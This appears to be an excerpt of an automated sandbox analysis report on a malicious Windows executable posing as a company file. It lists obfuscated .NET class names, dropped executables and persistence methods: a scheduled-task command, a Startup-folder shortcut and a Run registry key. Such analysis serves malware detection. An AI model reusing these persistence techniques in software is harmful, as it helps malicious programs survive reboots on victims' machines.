Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, GXpMZGv1DYx8eclQhb.cs	High entropy of concatenated method names: 'KoPZYBhF60', 'rncZgltk8v', 'Gl9ZOe5NAl', 'wnZZBSVfSR', 'K11ZHipBT4', 'AfsZjno0nB', 'T3DZw9LAED', 'PKVZbfGvp0', 'FncZAWsLVC', 'Ru5ZE8OZeU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, ibRWnPCp5Mnp1nfdT7.cs	High entropy of concatenated method names: 'jxiZdXpYPh', 'BZwZkGZ8QB', 'oIYZiFpI7x', 'VIJiImoIrk', 'huRizFyiho', 'FDMZ9qipOS', 'umsZ6t9Q1O', 'aZoZq8PCQE', 'ooIZSlQtB1', 'W9SZKBc8tf'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, z0CgWreVct1ReW3hxU.cs	High entropy of concatenated method names: 'mDAXFkkbHn', 'dctX5MK7Lg', 'g0vX1UHwpQ', 'j6MXTavJ4c', 'Y18XPtIOUL', 'RhBX43i8tY', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, nlbUxk0n9w0SE2fT7Q.cs	High entropy of concatenated method names: 'WWIO9AVG3', 'Ne7BnsFyu', 'bD7j21WOg', 'QenwWWX3C', 'K4tAy5db2', 'FVVERgVRY', 'KtUTIYS1GuG3NHE4hT', 'TneXqpwWvj94Synw3e', 'sYqXSVatY', 'EY8VvQfHi'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, OZMP2hxHpjh7kQFAPP.cs	High entropy of concatenated method names: 'zHSkBOqRCM', 'fvWkjnFHMI', 'QMUkbnecsd', 'WbRkAByqeu', 'wjyk3yw1ZY', 'bQakUMWAe6', 'PF2kc6KTkL', 'CKJkX9v5wS', 'j9tkMUQEKJ', 'dvnkVTQUiU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, CrrfYkO0sG17BJWtfW5.cs	High entropy of concatenated method names: 'MJiVYtxXQP', 'pBBVgBtZLN', 'eZKVOZRt5b', 'SXM6a1hB2Wh3aOPU4tB', 'aq00efhW0lmUyDNoI29', 'uddTSNhocRZNSkxL8ov', 'BAAsfnh00pMtM1VHsFv', 'L3vXCmhhfrYCZSKbPqy'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, xqcOSno5WVFAjguVYG.cs	High entropy of concatenated method names: 'PjeCHrVhhT', 'fJ1Cww9irJ', 'TNMk1c5LZM', 'Tx8kThUqZg', 'M91k4QKN9X', 'HS1kDOGODI', 'ox1k8tdxFm', 'dcQkQJxjMj', 'An2khOu51C', 'OJpksIvvBn'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, Uuj6qeW9tPXjBmNpHg.cs	High entropy of concatenated method names: 'ToString', 'BxxUm4fk9J', 'Qv0U57V9et', 'gfvU19R5LD', 'YJjUTfT8hJ', 'r4HU4xrivv', 'nnDUDT8Nm7', 'xWNU8CFPl5', 'IFHUQJSC27', 'NkdUhwRTFH'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, gv9ulKIH2QRgfIOudI.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Wo1qJryaEA', 'DqWqI58PXB', 'W3Uqz4ix98', 'J0XS9mcDjl', 'Y0oS6IBJBx', 'Q4JSqtkwUt', 'Ab2SSpPgvw', 'pIlUKKBtDd2wBeZchht'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, MBp5MtOrZjC7IY1p5BK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1qVPmxEEJ', 'DRMVvWacuy', 'gRrV0MPdjr', 'X7cVp0KttN', 'MeAVruIKI5', 'EdvVuP6MHE', 'aduV2JUp5X'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, gsQB8HRrROaMJigu8D.cs	High entropy of concatenated method names: 'AnOce1l820', 'HwXcW7xNac', 'ToString', 'NxlcdYfZPl', 'oEycauIgFw', 'Fc6ck42L0Z', 'PHCcCyhJ6e', 'wbrcipe1dp', 'T7vcZ0xLjW', 'VTLcniYyOl'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, jVOKqx6OHHAubw6pMN.cs	High entropy of concatenated method names: 'wV4NbIA5QD', 'CUQNAQr6Vs', 'nE6NFKTVhT', 'T1AN5dYyo7', 'vi6NT4mdAu', 'D00N4j8Bxg', 'OlNN8UZn9K', 'P1TNQuolZP', 'oTBNs4HKnn', 'I1ENmDMYmn'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	High entropy of concatenated method names: 't4rSL2c26G', 'SxXSd44Tdi', 'rZxSaJFkXb', 'fiXSkdiHdM', 'Ou0SCt4Dx9', 'G6ySiMIOnA', 'oGQSZfZ18x', 'LSiSnhZ3ll', 'IN7SfWnrA4', 'YvESeiRRFw'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dJa6sC2NfcTNVggMrM.cs	High entropy of concatenated method names: 'EZ6c7IB2gG', 'wbUcILSSQm', 'QT1X9jI0iR', 'tRkX6YTTiD', 'PWZcmH7bNt', 'iPqct10GRt', 'hPocxEkDp2', 'x1jcPfIGNT', 'xo6cvB2C6B', 'lUwc0vhIE4'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, vBXDN7cPr3ZGX8ky0g.cs	High entropy of concatenated method names: 'vEN6ZLAlPY', 'nlB6nVC6YJ', 'tX36e6QIRP', 'dH76W27ASA', 'fIt63JQWM9', 'plL6UVm9uL', 'GPnvoA4eyKgKhSgeYK', 'Oe5HtK52Gi0QMqiaCu', 'cor66QSbY9', 'Utk6SCP6jg'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, LuuKNTdSfqNmEuA9vR.cs	High entropy of concatenated method names: 'NyTXdUUnST', 'SAbXaci9UC', 'a1tXkmH6ka', 'biiXCjp2hq', 'aqkXiXthGN', 'aLKXZvFiyM', 'sRAXn1GsPH', 'MbCXfEwaJF', 'OGeXeXX8FR', 'accXWdo6pP'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, iQwA4eOJ8Zfn4HwcUAj.cs	High entropy of concatenated method names: 'cEXMYd4SRm', 'kkeMgRcSuH', 'nCqMOCYQc7', 'bQ7MBqi27n', 'HmbMHmWmU4', 'X7jMjqHQq0', 'CmsMwlGo8d', 'CYoMb6XpQ4', 'afnMAwQsUD', 's3fMEbsAEH'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, LwbRpltv1eAnYuONRA.cs	High entropy of concatenated method names: 'fhw3seLceb', 'x6S3tB16bH', 'vlk3Pk2ZwH', 'zFP3vf2m0M', 'iNu35BAFAo', 'KIU31Tia8Y', 'fdd3T36ZGr', 'zbM34jg97S', 'Mcm3DpfXPH', 'lmv38Hc11g'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, rWZZ7wHORJniJhaBFo.cs	High entropy of concatenated method names: 'Dispose', 'xoF6JoJX1N', 'lcEq57qBiY', 'cfgGG8m4Yr', 'iDr6IHDL7W', 'Wva6ziaYYN', 'ProcessDialogKey', 'sccq928ptv', 'S7vq691ehf', 'YPbqqChRhg'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, OM9lZPwkAKr27WGp6r.cs	High entropy of concatenated method names: 'GV1M60hwBb', 'F4MMSvjG1c', 'qQyMKjlQ04', 'PYaMdml7lZ', 'NJVMaKQwNU', 'NSnMCsgNBB', 'HYRMiaN6mt', 'HwxX2jeeW1', 'JWFX7MXQYH', 'OiJXJw5oEU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, jO1kLrkP6ITRPB9nRt.cs	High entropy of concatenated method names: 'e3yiLkv75w', 'Kvqia7Oluw', 'iXLiCiQfMB', 'RuuiZm7rqr', 'XWIincnmRA', 'biPCrgXJTD', 'NYeCuR1g51', 'swwC2J3LQV', 'pmhC7kZtQP', 'wwUCJdl7pJ'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.cs	High entropy of concatenated method names: 'lXwaPYplWD', 'z8Nav71VNK', 'iANa0QeSDq', 'j1Wap46uak', 'KPdarOnI7r', 'uYfaunmUii', 'u0Oa24HKnA', 'XsMa7Bwc1Z', 'ofiaJfrVbH', 'lr3aIFIlXL'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, GXpMZGv1DYx8eclQhb.cs	High entropy of concatenated method names: 'KoPZYBhF60', 'rncZgltk8v', 'Gl9ZOe5NAl', 'wnZZBSVfSR', 'K11ZHipBT4', 'AfsZjno0nB', 'T3DZw9LAED', 'PKVZbfGvp0', 'FncZAWsLVC', 'Ru5ZE8OZeU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, ibRWnPCp5Mnp1nfdT7.cs	High entropy of concatenated method names: 'jxiZdXpYPh', 'BZwZkGZ8QB', 'oIYZiFpI7x', 'VIJiImoIrk', 'huRizFyiho', 'FDMZ9qipOS', 'umsZ6t9Q1O', 'aZoZq8PCQE', 'ooIZSlQtB1', 'W9SZKBc8tf'

Drops PE files

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe			Jump to dropped file
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk

Jump to behavior

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd.			Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd.			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
